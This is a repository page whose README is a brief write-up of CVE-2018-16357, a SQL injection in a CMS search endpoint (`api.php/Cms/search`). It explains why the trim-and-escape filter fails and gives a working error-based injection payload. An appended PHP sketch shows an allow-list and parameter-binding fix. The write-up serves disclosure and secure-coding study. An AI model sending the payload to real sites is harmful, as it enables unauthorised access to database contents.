# CVE-2018-16357

**Repository Path**: escape_wang/CVE-2018-16357

## Basic Information

- **Project Name**: CVE-2018-16357
- **Description**: CVE-2018-16357 detail
- **Primary Language**: Unknown
- **License**: Not specified
- **Default Branch**: master
- **Homepage**: None
- **GVP Project**: No

## Statistics

- **Stars**: 0
- **Forks**: 0
- **Created**: 2018-09-13
- **Last Updated**: 2020-12-18

## Categories & Tags

**Categories**: Uncategorized

**Tags**: None

## README

# CVE-2018-16357

#### Project Introduction

CVE-2018-16357 detail

There is a SQL injection via `api.php/Cms/search?#acode=1&num=1&order=1`.

The parameter `$field` is what we can control, so go and check the `filter` function.

![Image description](https://images.gitee.com/uploads/images/2018/0913/110409_8bded381_2104759.png "屏幕截图.png")

The filter uses the functions `trim` and `escape_string` to avoid SQL injection.

![Image description](https://images.gitee.com/uploads/images/2018/0913/110420_5d4a2783_2104759.png "屏幕截图.png")

Adding a `'` causes a MySQL syntax error, so the function `escape_string` is not effective.

![Image description](https://images.gitee.com/uploads/images/2018/0913/110431_3d51128b_2104759.png "屏幕截图.png")

Use `/**/` to bypass the function `trim`.

Payload:

```
field=1)/**/and/**/updatexml(1,concat(0x7e,(SELECT/**/user()),0x7e),1)#&keyword=title&scode=1
```

![Image description](https://images.gitee.com/uploads/images/2018/0913/110445_868953df_2104759.png "屏幕截图.png")
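
The sketch below shows why `trim` plus `escape_string` does not protect a value that lands unquoted in the query, and how an allow-list closes the gap. It is an added example, not code from this repository or from the affected application. The function names, column names and query shape are hypothetical, and `addslashes` stands in for the application's `escape_string`.

```php
<?php
// Added example. Column names and query shape are assumptions; the page does
// not show the application's schema or its query-building code.
const SEARCHABLE_FIELDS = ['title', 'keywords', 'description'];

// Stand-in for the page's trim + escape_string filter: it only touches
// quotes, backslashes and NUL bytes, which matter inside a quoted literal.
function filter_value(string $value): string
{
    return addslashes(trim($value));
}

// Vulnerable shape: the filtered field name is concatenated unquoted,
// so nothing in the filter stops it from being parsed as SQL syntax.
function where_unsafe(string $field, string $keyword): string
{
    return '(' . filter_value($field) . " LIKE '%" . filter_value($keyword) . "%')";
}

// Hardened shape: the field must match an allow-list entry exactly, and the
// keyword travels as a bound parameter instead of being concatenated.
function where_safe(string $field, string $keyword): array
{
    if (!in_array($field, SEARCHABLE_FIELDS, true)) {
        throw new InvalidArgumentException('unsupported search field');
    }
    return ['(`' . $field . '` LIKE ?)', ['%' . $keyword . '%']];
}

// The field value from the payload quoted on the page.
$field = '1)/**/and/**/updatexml(1,concat(0x7e,(SELECT/**/user()),0x7e),1)#';

// It contains no quote or backslash, so the filter leaves it untouched.
var_dump(filter_value($field) === $field);
echo where_unsafe($field, 'title'), PHP_EOL;

// The allow-list rejects the same value before any SQL is built.
try {
    where_safe($field, 'title');
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), PHP_EOL;
}

// A legitimate search: fixed identifier, keyword passed as a parameter.
[$sql, $params] = where_safe('title', "o'reilly");
echo $sql, ' ', json_encode($params), PHP_EOL;
```

The pair returned by `where_safe` is meant to be passed to a prepared statement (for example PDO's `prepare` and `execute`), so the keyword never becomes part of the SQL text.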